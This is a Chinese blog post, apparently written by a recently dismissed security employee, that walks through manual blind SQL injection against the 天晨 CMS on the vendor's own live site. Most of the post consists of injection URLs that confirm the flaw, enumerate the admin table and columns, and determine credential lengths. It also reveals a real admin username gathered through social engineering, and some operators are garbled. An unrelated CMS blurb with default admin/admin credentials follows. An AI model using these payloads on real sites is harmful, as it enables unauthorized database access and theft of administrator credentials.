天晨设计整站SQL注入漏洞

 

先发点牢骚,刚刚了一个陌生的城市(上海),很容易找到了个公司上班了,那就是天晨,在他们公司我负责的是安全,在这里,我没天都是在检测安全,先是服务器,后是整站,呵呵,很清楚的记得,我上了八天班,在这八天里面,我都是认真很认真的去把没个漏洞,一个一个的补上,担心的事终于来到了,呵呵,不知道是我的问题还是其他原因公司经理找我了,呵呵说我XXXX原因,不能继续留在公司,呵呵意料之中,当天晚上回到了朋友家里,说真的以我以前的个性,他们公司的安全都是我做的,什么问题我应该很清楚,但我没那么做,也很奇怪的是,就在哪个时候服务器好象出了问题,呵呵,也许上天都在为我抱不平,好人做到底,发个Email给他们吧,安全还存在问题!今天的遭遇,我没怨过任何人,只能怪自己太傻!总结一下,自己真的太傻了!在这里只想说一句,朋友谢谢你送我的书,我不会忘记,但我也同时当着全网络的同行送你一句,做人要厚道!

最近在网络上看天晨设计整站的使用者也越来越多了,天晨整站系统是从NOWA 0.94修改而来的!基于NOWA的系统不单指天晨一个还有很多的!我在此就不一一列举了,核心都是一样,只是程序的附加功能就各自不同!安全方面因为基于NOWA的系统所以到目前知道的漏洞就只有上传而已。以下文章中就会出现NOWA修改系统漏洞当中从未有的SQL注入漏洞!只怪天晨修改程序的时候没有做好注入问题了!这个可不能怪我!谁叫人家程序设计员不会注意安全死角啊?

一,确定注入点
我们就拿官方网站进行测试,因为担心外面提供的版本并非最新版本导致文章的正确性有差异。首先我们提交
http://***.com/view.asp?
action=art&art_id=70 and 1=1 返回。
再次输入
http://***.com/view.asp?
action=art&art_id=70%20and%201=2 返回
从标准的SQL注入点检测and1=1和and 1=2d 信息返回可以看出,两个图片的分别这个程序的评论存在着SQL注入,因为现在基于NOWA的修改版本都是基于ACCESS数据库架构的,所以我们可以进一步的确定这个程序的数据库类型。

二,猜解数据库表
因为本人懒惰所以只好借用NBSI进行SQL注入的工作了,怎么知道是不是因为的NBSI实在太厉害了,不能够杀鸡用牛刀。竟然它全部检测不出我所找到的SQL注入点存在着SQL注入!实在太令人感到吃惊,NBSI太给面子了!所以我只好硬着头皮去进行手动注入了。首先猜解数据库的表是否存在admin表。构造语句提交
http://***.com/view.asp?
action=art&art_id=70%20and%200????
(select%20count(*)%20from%20admin)
现在的程序当中的数据库管理员表,不就是admin,adminuser user之类的名称,所以我们只要抓住程序作者的心理就可以知道了,提交语句之后页面返回正常,我们就可以确定数据库当中是存在admin这个表的。我们只是需要admin的密码以及账号,所以数据库当中其他的表可以忽略。

三,猜解数据库字段
在猜解之前为了减少更多的麻烦和无谓的猜解,应该要对于所入侵的网站进行一些资料的搜集,例如管理员的QQ以及管理员所使用的网名都是要知道的,因为我们通常都会使用容易记忆的密码以及账号,从而使自己可以不会忘记。找了文章页面等等的功能页面都找不到文章编辑以及管理员的QQ号码。只好在BBS当中寻找了,很幸运的是我们在BBS当中找到了“天晨”这个用户名,这样子等待会猜解admin账号的时候我们可以试试中文的名字或者是拼音字母。(我可是曾经在MSN以一个名字看穿PLMM性格以及生日的哦,大家要注意社会工程学的重要性啊)

废话少说,我们看看这个程序的管理员字段是什么!?首先猜解是name的提交语句如下http://***.com/view.asp?
action=art&art_id=70%20and%201=(select%20count
(*)%20from%20admin%20where%20len(name)??0)
(*_*不是啊!不是NAME字段啊)提交语句后信息返回页面显示不正常就证实admin表中没有name这个字段名。看来又要想想如何去进行猜解了,既然name字段不行就试试admin_name字段行不行!再次构造猜解字段语句:
http://***.com/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_name)??0)
(这下子总可以了吧?我又迈进一步了!)提交语句之后页面返回正常了,这下子终于可以了。
然后,我们就开始猜解password的字段了,其实一看上面的回显我们就可以非常肯定的说password字段就是admin_password,所以提交的语句就是
http://***.com/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_password)??0)
信息回显正常对吧!?哈哈哈
说到这里整个猜解就差不多完场了!(什么什么阿?还有账号和密码了?你丫的是不是傻了?)猜解密码和账号就更加是一个麻烦和浪费时间的活来的!好好,我们去看看账号和密码的猜解如何?首先我们猜解账号的长短阿!假设,我们之前就已经拿到了管理员常用的账号名称“天晨”是管理员账号。我们就有两种可能性,一是天晨的拼音“tianchen或tinzn”,二是天晨的中文转为ASCII码进行猜解。我们首先试试拼音这个的可能性,如果是这样子的话我们就要构造admin_name的长度为5,所以提交语句为http://***.com/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_name)??5) 页面信息返回无法正常显示。然后再提交
http://fj126.com/view.asp?
action=art&art_id=70%20and%201
=(select%20count(*)%20from%20admin%20where%20len
(admin_name)??4)这下子页面可算是正常了!然后再次提交语句为
http://***.com/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_name)=5)
我们就可以确定admin_name的长度为5了。账号长度出来了,而password的长度我们还不知道,根据信息收集得知密码是利用MD5 16位加密的,所以我们可以猜解为密码长度是16位喔!提交语句http://***.com/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_password)=16)
这里就不截图了!我们可以基本上就知道了!账号长度为5位,密码长度为16位。至于账号是多少密码是多少我就不再列举了!经过测试刚刚的社会工程学得到的管理员账号为:tinzn是正确的!而密码的确是MD516位加密。整个过程可以利用臭要饭的CSC进行注入测试!

四,总结
整个程序的SQL注入页面有几个,都是基于天晨整站自身添加的功能页面没有做好相关的SQL注入导致的,如果大家有在使用这个程序的话,可以使用通用防止注入的脚本进行防止,虽然说MD5需要暴力破解,但是如果你真的得罪人的话,不要说破解了。可能你的网站都会被别人干的一干二净,网络安全是很重要的一部分,希望大家不要轻视安全这个环节!以上文章如有错误请大家指出,有什么问题可以到本人BLOG或者发Email找我!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
如果你不能写程序给大家用,请不要说别人写的是垃圾!!! 如果你是个高手,请您教教我,只有中国的程序员水平都提高了,才能赶超印美!! 如果此软件你觉得不合你用,大可以不用,地球少了谁都一样转,我愿做一粒石子! 程序演示:http://www.deepteach.com/www1/ 官方网址:http://www.ITstudy.cn/ 程序开发:吕海鹏 程序简介: 由文章、下载、图片主要功能模块和广告、公告、调查、友情链接、网站统计、用户、数据库管理等多个通用模块组成,每个模块又包含若干个子模块,构建出强大和完善的功能体系。系统防止SQL注入攻击,对密码进行MD5不可逆加密处理。用户:admin密码:admin 【程序主要功能】 1、文章栏目无限级分类、自由添加,排序 2、文章可视化的在线编辑器提供了强大的图文混排功能,在线添加、编辑、删除 3、网站相关信息后台动态配置 4、自由添加友情链接 5、完善的支持HTML编码的广告模块, 6、软件下载 【系统开发环境】 1.系统环境:MSWINDOWS2003+IIS6.0 2.数据库:MSAccess2003 3.测试浏览器:Maxthon1.5.6.42MozillaFirefox5.0滕讯TT3.1微软IE浏览器7.0 4.系统分辨率:1024X768 5.开发工具:Dreamweaver8EditPlus2.21Access2003 【安装使用】 1、将整个目录上传到虚拟空间,即可直接访问index.asp首页文件(不可以将index.asp改成其它的名字,否则系统跳转出错),不需要做其他的操作。 2、后台登陆文件“admin/deep_login.asp”可任意更名(隐藏登陆路径)及更改管理目录名 3、管理员用户:admin密码:admin登录管理并修改密码 3、请确保你存放的文件夹有everyone可写权限 4、默认数据库为#data.mdb(可用记事本打开ConnDB.asp修改数据库路径或改名等设置,如不了解不要改动) 5、系统未提供软件的上传功能,请先使用FTP上传。FTP上传后请将地址复制到下面的地址框中。 【版本更新说明】 ver2.1.10 · ·登录页提供收藏功能,便于收藏管理 ·“论坛新帖”代码独立为一个include文件方便全局修改管理, ·增加email、QQ显示 ·文章标题增加[图文]显示标志 ·修订软件下载布局 ·更换简繁转换js代码 ·后台程序修改为按模块分目录管理 ·修订后台管理顶部栏目导航位置添加bug ver2.1.2 ·增加顶部栏目导航 ·修订ie7下·显示过小错误 ·增加文章浏览次数后台修改(可实现浏览****) ·前台页面div+css优化 ·增加后台文章批量删除 ·增加sogou搜索 ver2.0.25 ·修订首页新闻动态排序 ·修订首页flash图片新闻少于5个显示错误 ·增加后台下载栏目排序功能 ·修订首页子栏目标题more和文章标题不整齐 ·修订首页单元格宽度不整齐 ·修订css统一整理至一个Style文件夹下,方便Div+css管理 ·修订个页面论坛登陆,整合为一个文件统一调用 ·前台页面css优化 ·修订首页新闻动态显示内容,改为后台设定显示栏目 ·修订站内公告内容页bug ·修订后台文章添加、修改页,增加更新时间修改 ver2.0.15 ·修订站内公告,增加搜索链接、上下文链接 ·修订后台验证 ·修订文章内容页,增加加入收藏功能 ·修订文章内容页,增加页面打印功能 ·修订后台管理上传文件管理翻页错误 ·修订后台下载添加软件页翻页错误 ·美化后台管理 ·修订站点信息页 ·修订文章内容页,实现内容字体大小可变化 ·修订文章列表页,增加对应文章信息显示 ·修订文章一级栏目添加不显示错误 ·修订后台软件下载修改页所属栏目错误 ·调整后台管理目录 ·增加最新文章 ·页面SEO ver2.0.3 ·增加文章、下载总数统计 ·增加分页程序 ·更换图文新闻代码 ver2.0.0 ·完全重写整站代码及美工 ·增加图文新闻、当前在线人数统计 ·首页导航栏目可在上下任意显示 ·添加软件时能从已经上传的软件中进行选择,并自动显示软件大小。 ·后台增加软件图片与上传软件的显示与管理,实用的清除上传的无用垃圾图片或软件功能。 【特别感谢】 ... 【声明】 该软件遵守GPL条约,受GPL条约的保护。您可以自由复制、传播、使用但未经作者允许请勿用于商业场合。使用本软件造成的一切后果作者一概不负责任! 1、本软件及相关文档的版权及其他权利都归“DeepTeach.com吕海鹏”所有并保留一切权利。除了吕海鹏授权许可协议所提供的明确书面许可外,拥有本程序及相关文档并不赋予您任何有关这些版权或其他知识产权的许可。 2、本软件仅供学习。你可以任意使用、拷贝和分
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值